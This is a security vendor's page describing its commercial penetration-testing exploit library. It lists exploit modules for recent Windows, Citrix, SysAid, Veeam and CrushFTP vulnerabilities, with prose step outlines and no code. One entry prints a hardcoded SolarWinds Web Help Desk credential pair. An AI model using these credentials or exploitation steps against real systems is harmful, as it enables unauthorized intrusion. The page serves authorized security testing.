Exploit development can be an advanced penetration testing skill that takes time to master. Additionally, when on a job, pen testers often don’t have the resources to create a new exploit. Many resort to searching for and using pre-written exploits that have not been tested and must go through the timely effort of quality assurance testing in order to ensure they are secure and effective.
Core Impact users can save time by finding all the up-to-date exploits they need in one place. We provide a robust library of exploits designed to enable pen testers to safely and efficiently conduct successful penetration tests. Witten by our own internal team, you can trust they have been thoroughly tested and validated by our experts.
The universe of vulnerabilities is huge and not all of them represent the same risk for the customers. Vulnerabilities do not all have the same level of criticality. Some may be easily exploitable by a low-level user, while others may not be exploitable at all. To increase the efficiency of the attacks and the quality of the exploits provided, the Core Impact team has developed selection criteria to prioritize its analysis and implementation. We determine which exploits warrant creation based on the following questions:
What are the most critical attacks from the attacker’s perspective?
What new vulnerabilities are more likely to be exploited in real attacks?
What exploits are the most valuable for Core Impact?
Once an exploit is approved, its priority order considers the following variables:
Vulnerability Properties: CVE, disclosure date, access mechanism and privileges needed.
Target Environment Setup: OS, application prevalence, version and special configurations needed.
Value Provided to Core Impact: Customer request, usage in multiple attacks, allows the installation of an agent, etc.
Technical Cost vs. Benefit: An analysis weighing the resources needed to build an exploit with the internal and external knowledge gained in its creation.
Each one of these variables has a different weight and provides a ranking of the potential exploits to be developed. Following those criteria, the top of the list would contain, for example, a vulnerability on Windows (most popular OS) that can be exploited remotely, without authentication and that provides super user privileges.
Correspondingly, a vulnerability on an application that is rarely installed, needs special configurations, and requires User Interaction, would be at the bottom.
Stay Informed of New Core Certified Exploits
Subscribe to receive regular email updates on new exploits available for Core Impact
Browse the Core Certified Exploit Library
We provide pen testers with real-time updates for a wide range of exploits for different platforms, operating systems, and applications.
Search our continuously growing library to discover an exploit that will allow you to gain and retain access on the target host or application.
Title
Description
Date Added
CVE Link
Exploit Platform
Exploit Type
Product Name
Microsoft Internet Shortcut Remote File Execution Vulnerability Exploit
The vulnerability relates to the use of Windows .URL files to execute a remote binary via a UNC path. When the targeted user opens or previews the .URL file (for example, from an email), the system attempts to access the specified path (for example, a WebDAV or SMB share), resulting in the execution of arbitrary code.
Microsoft Management Console MSC Exploit (CVE-2025-26633) Update
A vulnerability in the Microsoft Management Console (MMC) allows remote code execution via social engineering. The attack uses malicious HTML content in .msc file via an embedded ActiveX, exploiting the rendering of Windows' internal Internet Explorer. This update removes the one-link tag
Citrix NetScaler ADC and Gateway Memory Overread Vulnerability CitrixBleed2 Exploit
An insufficient input validation leading to memory overread in Citrix NetScaler ADC and Citrix NetScaler Gateway when the NetScaler is configured as a Gateway (VPN virtual server, ICA Proxy, CVPN, RDP Proxy) OR AAA virtual server may allow unauthenticated remote attackers to exfiltrate cookies, session IDs, or passwords from the target application. The vulnerability is reached via the /p/u/doAuthentication.do endpoint. This module will attempt to trigger the vulnerability to determine if the target system is vulnerable.
Microsoft Management Console MSC Exploit (CVE-2025-26633)
This module exploits a vulnerability in Microsoft Management Console (MMC). This module runs a malicious web server on the CORE IMPACT Console and waits for an unsuspecting user to trigger the exploit by connecting to the web server. The Microsoft Management Console contains a security flaw that allows remote code execution via malicious .msc files with embedded ActiveX control. An attacker sends a crafted .msc file with embedded ActiveX containing a link to a malicious server. The server executes a script to fetch a PowerShell file ultimately deploying an agent.
This module uses an authenticated PHP object deserialization vulnerability to deploy an agent in Roundcube Webmail that will run with the same privileges as the webapp. The module will use the given credentials to authenticate against Roundcube Webmail in the target. Then, it will generate a payload for agent deployment and abuse the _from parameter defined in the upload.php file to inject it in the $_SESSION variable. This variable will be processed by the unserialize function in the rcube_session class.
The Vite development server is vulnerable to arbitrary file read due to insufficient path validation when processing URL requests. This exploit sends a crafted URL request to the Vite development server, that includes the target filename combined with an specific parameter. If the server responds 200 OK, after that processes the server's Base64-encoded response through a decoding routine and displays the file contents. Optionally, the exploit can save the leaked file locally where the user defines it in the OUTPUT_PATH parameter.
Microsoft Windows library-ms NTLMv2 Information Disclosure Exploit
This exploit leverages an information disclosure vulnerability in Microsoft Windows. By crafting a malicious .library-ms file, an attacker can coerce authentication to an untrusted server and steal NTLMv2 hashes. This exploit does not install an agent, it manages to obtain the NTLMv2 hash of a legitimate user. It is possible to use tools like "John the Ripper" to attempt decrypting the original password associated with the hash.
This module exploits an arbitrary file deletion vulnerability that allows an unprivileged user to delete files in protected folders. Before deleting the file, the module backs up the file to the user's temporary folder.
This module uses a XML External Entity vulnerability in combination with an authenticated OS command injection to deploy an agent in SysAid on-prem that will run with the sysaidinternal user privileges. The module will use the XML External Entity vulnerability located in the com.ilient.mdm.GetMdmMessage java class and accessed via the /mdm/serverurl endpoint to download the InitAccount.cmd file located in the C:\Program Files\SysAidServer\logs folder. The InitAccount.cmd contains the username and password of the main administrator in plain text in its first line.
This module uses a XML External Entity vulnerability in combination with an authenticated OS command injection to deploy an agent in SysAid on-prem that will run with the sysaidinternal user privileges. The module will use the XML External Entity vulnerability located in the com.ilient.mdm.GetMdmMessage java class and accessed via the /mdm/serverurl endpoint to download the InitAccount.cmd file located in the C:\Program Files\SysAidServer\logs folder. The InitAccount.cmd contains the username and password of the main administrator in plain text in its first line.
Exploits / OS Command Injection / Known Vulnerabilities
Impact
Windows Hyper-V NT Kernel Integration VSP Privilege Escalation Exploit (CVE-2025-21333)
The vulnerability in vkrnlintvsp.sys (VkiRootAdjustSecurityDescriptorForVmwp()) stems from insufficient validation of the Dacl AclSize field in a Security Descriptor. Since this value is user-controlled, an attacker can trigger an integer overflow in the ExAllocatePool2() size calculation, leading to a heap-based buffer overflow , allowing a local attacker to exploit them for privilege escalation. The steps performed by the exploit are: Sprays WNF objects to control heap layout. Calls NtCreateCrossVmEvent with a malicious Security Descriptor to overflow a heap buffer.
Veeam Backup and Replication Blacklist xmlFrameworkDs NET Deserialization Vulnerability Remote Code Execution Exploit
This module uses a .NET deserialization vulnerability to deploy an agent in Veeam Backup and Replication that will run with the NT AUTHORITY\SYSTEM user privileges. The module will trigger the vulnerability by crafting a Veeam.Backup.EsxManager.xmlFrameworkDs .NET class type object and sending it to the /VeeamAuthService .NET remoting endpoint using an external .NET executable. The deserialization of the crafted object will execute system commands to deploy the agent.
This vulnerability enables unauthenticated attackers to bypass authentication in CrushFTP versions 10.0.0 through 10.8.3 and 11.0.0 through 11.3.0. The vulnerability stems from how the CrushAuth cookie and AWS4-style Authorization header are processed, allowing attackers to impersonate an administrator by crafting specific values using a valid username. A valid username is required for the attack to succeed, but no password is needed. By default, CrushFTP includes a built-in administrative user named crushadmin.
This module uses a message header injection vulnerability to deploy an agent in Apache Camel that will run with the same privileges as the webapp. First, this module will use the vulnerability to determine the underlying OS system and check if the target is vulnerable. If the underlying OS can be determined, then the target is assumed to be vulnerable and the vulnerability will be used again to deploy an agent.
Exploits / OS Command Injection / Known Vulnerabilities
Impact
Microsoft Windows Cloud Files Mini Filter Driver Privilege Escalation Exploit (CVE-2024-30085)
The Cloud Files Mini Filter Driver (cldflt.sys) present in Microsoft Windows is vulnerable to a buffer overflow, which can result in out-of-bounds memory write to paged pool memory. This module allows a local unprivileged user to execute arbitrary code with SYSTEM privileges. The steps performed by the exploit are: Register a sync root and set its reparse point data Spray memory using WNF and ALPC Trigger the vulnerability to get an arbitrary write Overwrite the token privileges of current process Inject a new agent into an elevated process to run as SYSTEM
Microsoft Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability Exploit (CVE-2024-30085)
The Cloud Files Mini Filter Driver (cldflt.sys) present in Microsoft Windows is vulnerable to a buffer overflow, which can result in out-of-bounds memory write to paged pool memory. This module allows a local unprivileged user to execute arbitrary code with SYSTEM privileges.
Windows Error Reporting Privilege Escalation Exploit (CVE-2024-26169)
The Windows Error Reporting (WER) service, which runs with SYSTEM privileges, interacts with registry keys to store and process crash reports. The vulnerability stems from weak access controls on these registry keys, allowing a local attacker to exploit them for privilege escalation.
SolarWinds Web Help Desk Hardcoded Credentials Vulnerability Checker
CVE-2024-28987 affects SolarWinds Web Help Desk 12.8.3 Hotfix 1 and all previous versions due to the presence of hardcoded credentials in the application. This vulnerability allows an unauthenticated attacker to access the REST API using Basic Authentication with predefined credentials (helpdeskIntegrationUser/dev-C4F8025E7), enabling them to read, modify, and create tickets.
Microsoft Windows Common Log File System Driver Elevation of Privilege Vulnerability Exploit (CVE-2024-38196)
The Common Log File System Driver (clfs.sys) present in Microsoft Windows is vulnerable to a memory corruption vulnerability. This module allows a local unprivileged user to execute arbitrary code with SYSTEM privileges by creating a specially crafted BLF file. The steps performed by the exploit are: Create a crafted BLF file Trigger the vulnerability to get an arbitrary read/write primitive Get SYSTEM privileges by replacing the current process token
Windows Common Log File System Driver LoadContainerQ Elevation of Privilege Vulnerability Exploit
CLFS.sys driver before 10.0.22621.4601 in Windows 11 23H2 exposes functionality that allows low-privileged users to read and write arbitrary memory via specially crafted requests and elevate system privileges. The steps performed by the exploit are: Allocate memory at address 0x0000000002100000 (stored in the variable pcclfscontainer). Call CreateLogFile() and AddLogContainer() to create the .BLF and the container files under selected path. Fetch the malicious .BLF from the data replaced in the executable and overwrite the original .BLF with the crafted .BLF.
Microsoft Kernel Streaming WOW Thunk Service Driver Elevation of Privilege Vulnerability Exploit (CVE-2024-38144)
The Kernel Streaming WOW Thunk Service module (ksthunk.sys) present in Microsoft Windows is vulnerable to an integer overflow, which can result in arbitrary memory write. This module allows a local unprivileged user to execute arbitrary code with SYSTEM privileges.
Microsoft Windows Ancillary Function Driver UAF Privilege Excalation Exploit (CVE-2024-38193)
Afd.sys module present in Microsoft Windows is vulnerable to a race condition during buffer management, where a temporary reference counter increment is improperly handled, leading to use-after-free scenarios. This occurs when accessing registered buffers for send/receive operations. The steps performed by the exploit are: Creates corrupt kernel structures Gets arbitrary read/write primitives Steals token for privilege escalation Restores system state Creates a new agent process running as SYSTEM
Enhance identity management in exploits. * Linked created identities in the Module Output: Added a reference to the created identity in the Module Output. * Added Validated and Validated in properties to identities: Ensured that created identities include Validated=True and are associated with the target (Validated in) where they were verified.
This module uses a stack-based buffer overflow vulnerability to deploy an agent in Ivanti Connect Secure that will run with the nr user privileges. First, this module will check if the target is an Ivanti Connect Secure appliance. If it is, it will determine if the target is vulnerable by retrieving it's version number using 2 different methods. Then, the module will try to leak the base address of the libdsplibs.so library. To perform this, a random endpoint will be registered in the local webserver.